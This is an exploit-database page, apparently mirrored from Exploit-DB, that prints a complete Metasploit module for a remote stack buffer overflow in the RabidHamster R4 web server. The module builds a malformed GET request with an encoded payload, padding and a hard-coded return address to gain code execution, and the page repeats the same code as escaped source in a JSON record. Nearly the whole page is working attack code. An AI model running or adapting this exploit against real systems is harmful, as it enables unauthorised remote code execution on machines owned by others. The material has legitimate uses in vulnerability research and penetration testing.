Search...

RabidHamster R4 Log Entry sprintf Buffer Overflow

2012-05-25T00:00:00

ID EDB-ID:18929
Type exploitdb
Reporter metasploit
Modified 2012-05-25T00:00:00

Description

RabidHamster R4 Log Entry sprintf() Buffer Overflow. Remote exploit for windows platform

                                        
                                            ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 &lt; Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           =&gt; "RabidHamster R4 Log Entry sprintf() Buffer Overflow",
			'Description'    =&gt; %q{
					This module exploits a vulnerability found in RabidHamster R4's web server.
				By supplying a malformed HTTP request, it is possible to trigger a stack-based
				buffer overflow when generating a log, which may result in arbitrary code
				execution under the context of the user.
			},
			'License'        =&gt; MSF_LICENSE,
			'Author'         =&gt;
				[
					'Luigi Auriemma',  #Discovery, PoC
					'sinn3r'           #Metasploit
				],
			'References'     =&gt;
				[
					['OSVDB', '79007'],
					['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],
					['URL', 'http://secunia.com/advisories/47901/']
				],
			'Payload'        =&gt;
				{
					'StackAdjustment' =&gt; -3500,
					'BadChars' =&gt; "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20"
				},
			'DefaultOptions'  =&gt;
				{
					'ExitFunction' =&gt; "process"
				},
			'Platform'       =&gt; 'win',
			'Targets'        =&gt;
				[
					['R4 v1.25', {'Ret'=&gt;0x73790533}]  #JMP ESI (ddraw.dll)
				],
			'Privileged'     =&gt; false,
			'DisclosureDate' =&gt; "Feb 09 2012",
			'DefaultTarget'  =&gt; 0))

			register_options(
				[
					OptPort.new('RPORT', [true, 'The remote port', 8888])
				], self.class)
	end

	def check
		res = send_request_cgi({
			'method' =&gt; 'GET',
			'uri'    =&gt; '/'
		})

		if res and res.headers['Server'] == 'R4 Embedded Server'
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCoded::Safe
		end
	end

	def exploit
		buf = ''
		buf &lt;&lt; payload.encoded
		buf &lt;&lt; rand_text_alpha(2022-buf.length, payload_badchars)
		buf &lt;&lt; [target.ret].pack("V*")
		buf &lt;&lt; pattern_create(200)
		buf &lt;&lt; rand_text_alpha(3000-buf.length, payload_badchars)

		send_request_cgi({
			'method' =&gt; 'GET',
			'uri'    =&gt; "/?#{buf}"
		})
	end
end

JSON Vulners Source

Initial Source

{"id": "EDB-ID:18929", "hash": "05960aeb90c61e94874916d1508d5ea0", "type": "exploitdb", "bulletinFamily": "exploit", "title": "RabidHamster R4 Log Entry sprintf Buffer Overflow", "description": "RabidHamster R4 Log Entry sprintf() Buffer Overflow. Remote exploit for windows platform", "published": "2012-05-25T00:00:00", "modified": "2012-05-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/18929/", "reporter": "metasploit", "references": [], "cvelist": [], "lastseen": "2016-02-02T10:43:42", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/18929/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"RabidHamster R4 Log Entry sprintf() Buffer Overflow\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in RabidHamster R4's web server.\r\n\t\t\t\tBy supplying a malformed HTTP request, it is possible to trigger a stack-based\r\n\t\t\t\tbuffer overflow when generating a log, which may result in arbitrary code\r\n\t\t\t\texecution under the context of the user.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Luigi Auriemma', #Discovery, PoC\r\n\t\t\t\t\t'sinn3r' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['OSVDB', '79007'],\r\n\t\t\t\t\t['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],\r\n\t\t\t\t\t['URL', 'http://secunia.com/advisories/47901/']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'BadChars' => \"\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x20\"\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"process\"\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['R4 v1.25', {'Ret'=>0x73790533}] #JMP ESI (ddraw.dll)\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Feb 09 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptPort.new('RPORT', [true, 'The remote port', 8888])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => '/'\r\n\t\t})\r\n\r\n\t\tif res and res.headers['Server'] == 'R4 Embedded Server'\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCoded::Safe\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tbuf = ''\r\n\t\tbuf << payload.encoded\r\n\t\tbuf << rand_text_alpha(2022-buf.length, payload_badchars)\r\n\t\tbuf << [target.ret].pack(\"V*\")\r\n\t\tbuf << pattern_create(200)\r\n\t\tbuf << rand_text_alpha(3000-buf.length, payload_badchars)\r\n\r\n\t\tsend_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => \"/?#{buf}\"\r\n\t\t})\r\n\tend\r\nend\r\n", "osvdbidlist": ["79007"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}